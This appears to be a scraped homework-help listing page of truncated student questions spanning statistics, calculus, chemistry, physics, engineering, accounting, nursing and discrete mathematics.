##### Problem 4: In a survey, SUNY Broome students were asked how long it took them to commute to school. A total of 35 students responded. The mean commute time was 20.2 minutes with a standard deviation of 4.4 minutes. (20 points total) (a) What are the sample mean, standard deviation, and sample size? Use correct notation and include appropriate units. (b) Is the sample size large enough so that a t-distribution applies? Explain. (c) Find the standard error by hand. Round to three decimal places. (d) Find ...
##### Find the number of units at which maximum profit is achieved, given the profit function P(x) for a firm making the product. Find the maximum profit.
##### Pls give your answer in paragraphs with appropriate examples where necessary. And make sure to give...
Please give your answer in paragraphs, with appropriate examples where necessary, and make sure to give 400 words or more, with some references. Why is there a need for "school health"? What is a "coordinated school health program"? And what are "foundations of school he...
##### Determine algebraically whether each function is even, odd, or neither. $f(x)=\frac{1}{x^{4}}$
##### Use the Product Rule of Logarithms to write the completely expanded expression equivalent to ln(9x(2x+5)). Make sure to use parentheses around your logarithm functions ln(x+y).
##### SM QUESTIONS 1. Identify the stage of disaster management that the city of Saber has reached....
SM QUESTIONS 1. Identify the stage of disaster management that the city of Saber has reached. A. Prevention (or mitigation) B. Preparedness C. Response D. Recovery Chapter 23: Public Health Nursing Practice and the Disaster Management Cycle Student Case Studies The Saber City Disaster Preparedness (...
##### 15. From the information given in the textbook, calculate the standard free energy change at 25.0...
15. From the information given in the textbook, calculate the standard free energy change at 25.0 °C for the reaction between 0.620 mol hydrogen gas and 0.220 mol nitrogen to form ammonia, shown in the following equation: 3H2(g) + N2(g) → 2NH3(g). A: no; -6.77...
##### Perform the multiplication or division and simplify. $\frac{x^{2}-25}{x^{2}-16} \cdot \frac{x+4}{x+5}$
##### 14. Express the heat capacity at constant pressure, Cp, and that at constant volume, Cv, for the case of an ideal gas by using enthalpy H, temperature T and the gas constant R. How about the case of free expansion of an ideal gas into vacuum?
##### Use moment distribution method or slope deflection method. The frame shown if Fig. 2.1 is supporting...
Use the moment distribution method or the slope deflection method. The frame shown in Fig. 2.1 is supporting a lateral load of 60 kN and a gravity load of 50 kN/m. Neglect the weight of the members. (a) Determine the reaction forces. (b) Draw the axial, shear, and bending moment diagrams and the qualitative deflecte...
##### 3. If $X_1,\ldots,X_n \sim N(\mu,\sigma^2)$ and $\sigma^2$ is unknown, let $\bar X = \frac{1}{n}\sum_{i=1}^n X_i$ be the sample mean; then the standard error of $\bar X$ is $\sigma/\sqrt{n}$. Choose:
##### Question 23. Determine whether the pair of lines is parallel, perpendicular, or neither: 3x - 2y = -15 and 2x + 3y = -15. (Parallel / Perpendicular / Neither)
##### The Precision Scientific Instrument Company manufactures thermometers that are supposed to give readings of 0 °C at...
The Precision Scientific Instrument Company manufactures thermometers that are supposed to give readings of 0 °C at the freezing point of water. Tests on a large sample of these thermometers reveal that at the freezing point of water, some give readings below 0 °C (denoted by negative numbers) and ...
##### Question 6. Show that the three distinct eigenvalues of $A\mathbf{x} = \lambda\mathbf{x}$, where $A$ is the given matrix, are $\lambda_1 = 2$, $\lambda_2 = 1$ and $\lambda_3 = 5$. [6 marks] Show that the eigenvectors corresponding to $\lambda_1$, $\lambda_2$ and $\lambda_3$ above are $\mathbf{x}_1 = (2,0,1)$, $\mathbf{x}_2 = (\ldots,-4,2)$ and $\mathbf{x}_3 = (3,0,2)$ respectively. Hence, set out the spectral matrix and the modal matrix, M, for this particular coefficient matrix. [10 marks] Use three iterations of the Jacobi method, with the initial approximation (1,1,1), to find the approximate solution to the linear system: ...
##### A chimpanzee named Allison pushes a box. She loads the box full of her toys until...
A chimpanzee named Allison pushes a box. She loads the box full of her toys until it has a mass of 8 kg. The coefficient of kinetic friction between the box and the floor is mu k = 0.4. The box is initially in motion, and moving at a velocity of 1.2 m/s to the right. a) If Allison pushes horizontall...
##### Find the area of the parallelogram with vertices A(-2, 4), B(0, 7), C(4, 5), and D(2, 2).
##### Please use R for this problem, provide R codes. Kiplinger's "Best Values in Public Colleges" provides...
Please use R for this problem, and provide the R code. Kiplinger's "Best Values in Public Colleges" provides a ranking of U.S. public colleges based on a combination of various measures of academics and affordability. The dataset "EX11-18BESTVAL.csv" includes a sample of 25 colleges fro...
##### Refer to Fig. $2.86,$ where $A B$ is a diameter, $T B$ is $a$ tangent line at $B,$ and $\angle A B C=65^{\circ} .$ Determine the indicated angles. $\angle B C T$
##### Use limit laws and continuity properties to evaluate the limit. $\lim _{(x, y) \rightarrow(1 / 2, \pi)}\left(x y^{2} \sin x y\right)$
##### How do you determine the domain and range of a function?
##### 11. No two electrons can have the same four quantum numbers is known as (the) A....
11. No two electrons can have the same four quantum numbers is known as (the) A. Pauli exclusion principle. B. Hund's rule. C. Aufbau principle. D. Heisenberg uncertainty principle. 12. Give the ground state electron configuration for Sn. A. [Kr]5525d 105p2 B. [Kr]5524d105p2 C. [Kr]5524d105p4 D....
##### (12 pts) Consider the following reaction: $Ba_3(PO_4)_2(s) \rightleftharpoons 3Ba^{2+}(aq) + 2PO_4^{3-}(aq)$, $K_{sp} = 3.4\times 10^{-23}$. A solution is prepared by mixing 75.0 mL of 0.150 M $Ba^{2+}$ with 60.0 mL of 0.120 M $PO_4^{3-}$. A precipitate forms. Calculate the concentration of each ion at equilibrium.
##### Barlow Company manufactures three products—A, B, and C. The selling price, variable costs, and contribution margin for one unit of each product follow:
Product: A, B, C. Selling price: $180, $270, $240. Variable expenses: direct materials 24, 80, 32; other variable expenses ...
##### Discusses different areas that currently make up the field of Recreation. Select 1 of the...
Discusses different areas that currently make up the field of Recreation. Select 1 of the areas in which you would be interested in working and address these questions: What type of job would you like to perform, and why? What sort of daily activities would this job require? What credentials would you...
##### (6 points) Let $\eta$ be the sequence E,U,L,E,R and $\pi$ the string EULER. Let S be the set of subsequences of $\eta$ and T the set of substrings of $\pi$. Determine whether $|S| = |T|$ and justify your answer. (Note: $\eta$ is the lowercase Greek letter eta.) Let $X = \{a,b,c,d,e\}$ and $Y = \{a,e\}$, and let $S$ be the relation on $P(X)$ defined as follows: $(A,B) \in S$ if $A\cap Y = B\cap Y$. (6 points) Show that S is an equivalence relation. (points) Determine the number of distinct equivalence classes
##### 2 (12 points) The arrival process of customers at a taxi stand is Poisson at rate $\lambda$, and the arrival process of taxis at the stand is Poisson at rate $\mu$. Arriving customers who find taxis waiting (being delayed) leave immediately in a taxi. Arriving taxis who find customers waiting leave immediately with one customer each. Otherwise, customers will queue up to a limit of $c$ customers, i.e., arriving customers who find $c$ other customers waiting leave immediately without a taxi. Similarly, taxis queue ...